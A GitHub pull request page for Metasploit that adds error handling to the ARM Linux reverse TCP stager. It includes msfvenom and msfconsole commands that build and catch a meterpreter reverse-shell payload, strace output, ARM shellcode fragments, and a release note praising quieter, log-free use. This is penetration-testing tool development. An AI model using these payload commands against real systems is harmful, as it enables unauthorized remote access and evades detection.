Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add error handling to ARM linux reverse tcp stager #8543

Merged
merged 6 commits into from Jun 18, 2017
Merged

Add error handling to ARM linux reverse tcp stager #8543

merged 6 commits into from Jun 18, 2017

Conversation

tkmru
Copy link
Contributor

@tkmru tkmru commented Jun 11, 2017
edited by timwr

I add error handling to arm linux reverse tcp stager. for Linux reverse_tcp stager segfaults when it can't connect · Issue #7722 · rapid7/metasploit-framework.

Verification

List the steps needed to make sure this thing works

  • ./msfconsole -qx "use exploit/multi/handler; set payload linux/armle/meterpreter/reverse_tcp; set lhost IP_ADDR; set lport PORT_NUMBER; set ExitOnSession false; run -j"
  • follow commands
$ ./msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=6666 -f elf -o ./reverse_tcp
$ sudo chmod +x ./reverse_tcp
$ strace ./reverse_tcp 
execve("./reverse_tcp", ["./reverse_tcp"], [/* 14 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(6666), sin_addr=inet_addr("192.168.0.1")}, 16) = -1 ETIMEDOUT (Connection timed out)
exit(1)                                 = ?

@timwr
Copy link
Contributor

timwr commented Jun 12, 2017

It's possible I'm doing something stupid but this isn't opening a valid session for me anymore (with the handler started):

execve("./elf", ["./elf"], [/* 14 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.0.1")}, 16) = 0
recv(3, "\210\0\0\0", 4, 0)             = 4
mmap2(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_EXECUTABLE, -1, 0) = 0xb6f0b000
exit(1)

It might also be worth also updating the original assembly here:
https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/linux/armle/stager_sock_reverse.s

@tkmru
Copy link
Contributor Author

tkmru commented Jun 12, 2017

It's my misstake. sorry. I fix it later.

busterb
busterb reviewed Jun 14, 2017
View reviewed changes
modules/payloads/stagers/linux/armle/reverse_tcp.rb Outdated
0xe3a05000, # mov r5, #0
0xef000000, # svc 0x00000000 ; invoke mmap2
0xe3500000, # cmp r0, #0
0xba000012, # blt 817c <failed>
Copy link
Member

@busterb busterb Jun 14, 2017
edited

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

doesn't mmap return a pointer? you'd want a beq here I think, not a blt

@tkmru tkmru force-pushed the fix/linux_reverse_tcp_arm branch 2 times, most recently from a7498c9 to 93c4b3f Compare June 16, 2017 06:29
@timwr timwr merged commit 1773a5f into rapid7:master Jun 18, 2017
timwr added a commit that referenced this pull request Jun 18, 2017
@timwr
Land #8543, add error handling to ARM linux reverse tcp stager
03116d7
@timwr
Copy link
Contributor

timwr commented Jun 18, 2017

Excellent work @tkmru many thanks 👍

@tkmru
Copy link
Contributor Author

tkmru commented Jun 19, 2017

@timwr many thanks for supporting me.

@alrosenthal-r7
Copy link

alrosenthal-r7 commented Jun 28, 2017
edited

Release Notes

This fix resolves inadequate error handling in the payloads/stagers/linux/armle/reverse_tcp module, which caused the module to crash. Every crash would be logged, so by avoiding crashes you can now use the module quietly.

@alrosenthal-r7 alrosenthal-r7 added the rn-fix release notes fix label Jun 28, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@busterb busterb busterb left review comments

Assignees
No one assigned
Labels
rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@tkmru @timwr @alrosenthal-r7 @busterb